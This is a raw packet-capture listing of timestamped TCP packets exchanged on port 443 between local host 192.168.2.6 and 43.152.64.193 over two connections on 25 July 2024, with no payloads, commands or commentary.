Jul 25, 2024 11:25:40.550968885 CEST	49713	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:40.551565886 CEST	443	49713	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:40.551624060 CEST	49713	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:40.551631927 CEST	443	49713	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:40.551664114 CEST	49713	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:40.553594112 CEST	443	49713	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:40.553656101 CEST	49713	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:40.553667068 CEST	443	49713	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:40.553703070 CEST	49713	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:40.629673004 CEST	443	49713	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:40.629786015 CEST	49713	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:40.629808903 CEST	443	49713	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:40.629849911 CEST	49713	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:40.630470991 CEST	443	49713	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:40.630530119 CEST	49713	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:40.630534887 CEST	443	49713	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:40.630569935 CEST	49713	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:40.632441998 CEST	443	49713	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:40.632508039 CEST	49713	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:40.632519007 CEST	443	49713	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:40.632555008 CEST	49713	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:40.633435011 CEST	443	49713	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:40.633505106 CEST	49713	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:40.633512974 CEST	443	49713	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:40.633547068 CEST	49713	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:40.637445927 CEST	443	49713	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:40.637464046 CEST	443	49713	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:40.637536049 CEST	49713	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:40.637552977 CEST	443	49713	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:40.637593985 CEST	49713	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:40.639516115 CEST	443	49713	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:40.639532089 CEST	443	49713	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:40.639605999 CEST	49713	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:40.639621019 CEST	443	49713	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:40.639657021 CEST	49713	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:40.642137051 CEST	443	49713	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:40.642153978 CEST	443	49713	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:40.642229080 CEST	49713	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:40.642242908 CEST	443	49713	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:40.642281055 CEST	49713	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:40.644639969 CEST	443	49713	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:40.644679070 CEST	443	49713	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:40.644714117 CEST	49713	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:40.644728899 CEST	443	49713	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:40.644747972 CEST	49713	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:40.644772053 CEST	49713	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:40.647124052 CEST	443	49713	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:40.647140026 CEST	443	49713	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:40.647202015 CEST	49713	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:40.647207022 CEST	443	49713	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:40.647241116 CEST	49713	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:40.648073912 CEST	443	49713	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:40.648139954 CEST	49713	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:40.648144007 CEST	443	49713	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:40.648179054 CEST	49713	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:40.648988962 CEST	443	49713	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:40.649055004 CEST	49713	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:40.649059057 CEST	443	49713	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:40.649095058 CEST	49713	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:40.721883059 CEST	443	49713	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:40.721908092 CEST	443	49713	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:40.722044945 CEST	49713	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:40.722069025 CEST	443	49713	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:40.722770929 CEST	49713	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:40.723840952 CEST	443	49713	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:40.723859072 CEST	443	49713	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:40.723988056 CEST	49713	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:40.724009991 CEST	443	49713	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:40.724062920 CEST	49713	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:40.726541996 CEST	443	49713	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:40.726560116 CEST	443	49713	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:40.726623058 CEST	49713	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:40.726644039 CEST	443	49713	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:40.726768017 CEST	49713	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:40.728429079 CEST	443	49713	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:40.728468895 CEST	443	49713	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:40.728519917 CEST	49713	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:40.728538036 CEST	443	49713	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:40.728575945 CEST	49713	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:40.728575945 CEST	49713	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:40.731317043 CEST	443	49713	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:40.731333017 CEST	443	49713	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:40.731437922 CEST	49713	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:40.731453896 CEST	443	49713	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:40.731631041 CEST	49713	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:40.754592896 CEST	443	49713	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:40.754611969 CEST	443	49713	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:40.754700899 CEST	49713	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:40.754728079 CEST	443	49713	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:40.754967928 CEST	49713	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:40.755471945 CEST	443	49713	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:40.755814075 CEST	49713	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:40.755827904 CEST	443	49713	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:40.756380081 CEST	49713	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:40.757391930 CEST	443	49713	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:40.757409096 CEST	443	49713	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:40.757791042 CEST	49713	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:40.757810116 CEST	443	49713	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:40.758069038 CEST	49713	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:40.758079052 CEST	443	49713	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:40.758091927 CEST	443	49713	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:40.758176088 CEST	443	49713	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:40.758217096 CEST	49713	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:40.758217096 CEST	49713	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:40.758403063 CEST	49713	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:40.758403063 CEST	49713	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:40.758421898 CEST	443	49713	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:40.758527994 CEST	49713	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:40.804008961 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:40.804061890 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:40.804373980 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:40.804373980 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:40.804411888 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.154216051 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.154280901 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.154923916 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.154942989 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.155107975 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.155113935 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.564872980 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.564905882 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.564985037 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.565006971 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.565020084 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.565052986 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.653002977 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.653027058 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.653064966 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.653090000 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.653103113 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.653120995 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.655988932 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.656074047 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.656096935 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.656130075 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.662117004 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.662137032 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.662189960 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.662208080 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.662237883 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.664324999 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.664398909 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.664412022 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.664449930 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.755388021 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.755501032 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.755522013 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.755841017 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.756211042 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.756274939 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.756279945 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.756309032 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.757983923 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.758001089 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.758061886 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.758069038 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.758100033 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.761284113 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.761377096 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.761394024 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.761647940 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.762603998 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.762667894 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.762681007 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.763350964 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.763361931 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.763369083 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.763408899 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.836803913 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.836827993 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.836966038 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.836982012 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.837017059 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.838556051 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.838572025 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.838660955 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.838660955 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.838668108 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.838695049 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.840078115 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.840092897 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.840145111 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.840148926 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.840178967 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.841418028 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.841450930 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.841469049 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.841475010 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.841512918 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.841512918 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.843369961 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.843385935 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.843430996 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.843436003 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.843456984 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.843630075 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.845190048 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.845204115 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.845273018 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.845273018 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.845278978 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.846401930 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.846566916 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.846581936 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.846635103 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.846642017 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.846780062 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.847495079 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.847553015 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.847558022 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.847763062 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.848795891 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.848855019 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.848860979 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.848901987 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.931871891 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.932085037 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.932104111 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.932143927 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.932364941 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.932501078 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.932506084 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.933121920 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.933154106 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.933159113 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.933192015 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.933456898 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.934108973 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.934128046 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.934180975 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.934189081 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.934221983 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.935039043 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.935101986 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.935108900 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.935143948 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.935986042 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.936050892 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.936057091 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.936347961 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.936995983 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.937061071 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.937072992 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.937417984 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.938039064 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.938055992 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.938450098 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.938457012 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.938585997 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.939486980 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.939502001 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.939594984 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.939601898 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.939670086 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.940385103 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.940398932 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.940447092 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.940455914 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.940506935 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.941842079 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.941879034 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.941907883 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.941916943 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:42.941951036 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:42.941951036 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:43.021101952 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:43.021128893 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:43.021203995 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:43.021203995 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:43.021222115 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:43.021646023 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:43.022173882 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:43.022192955 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:43.022294044 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:43.022299051 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:43.022351027 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:43.023643017 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:43.023821115 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:43.023824930 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:43.023941994 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:43.024014950 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:43.024250031 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:43.024254084 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:43.024302006 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:43.031447887 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:43.031467915 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:43.031541109 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:43.031548977 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:43.031852961 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:43.039057970 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:43.039077044 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:43.039155960 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:43.039161921 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:43.039397001 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:43.044519901 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:43.044537067 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:43.044791937 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:43.044799089 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:43.044848919 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:43.052781105 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:43.052825928 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:43.052874088 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:43.052880049 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:43.052912951 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:43.052913904 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:43.061417103 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:43.061435938 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:43.061517000 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:43.061523914 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:43.061559916 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:43.113100052 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:43.113241911 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:43.113259077 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:43.113369942 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:43.113586903 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:43.113672972 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:43.113682032 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:43.113725901 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:43.114855051 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:43.114873886 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:43.114929914 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:43.114943027 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:43.114979982 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:43.120227098 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:43.120249033 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:43.120311022 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:43.120323896 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:43.120357990 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:43.121599913 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:43.121618032 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:43.121687889 CEST	49714	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:43.121696949 CEST	443	49714	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:43.121726036 CEST	49714	443	192.168.2.6	43.152.64.193
